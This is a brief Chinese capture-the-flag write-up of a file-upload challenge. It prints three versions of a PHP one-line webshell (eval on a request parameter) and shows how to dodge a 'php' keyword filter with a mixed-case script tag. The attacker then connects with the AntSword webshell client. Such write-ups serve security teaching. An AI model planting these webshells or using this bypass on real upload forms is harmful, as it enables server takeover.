页面题目:
页面写着可以你可以随意上传文件,那就上传一个普通的一句话木马
<?php eval($_REQUEST['a']);
发现上传成功,然后点击上传成功
发现没有解析,猜测有可能是过滤了php这个字符串,换成短标签试一下
<? eval($_REQUEST['a']); ?>
发现也没有被解析
怀疑还有可能过滤了<?符号,不过还可以用<script language="php"></script>,不过php被过滤了,可以换成PhP
<script language="PhP"> eval($_REQUEST['a']); </script>
空白页面,php有可能解析了,然后用蚁剑连接。
连接成功,也找到了flag。
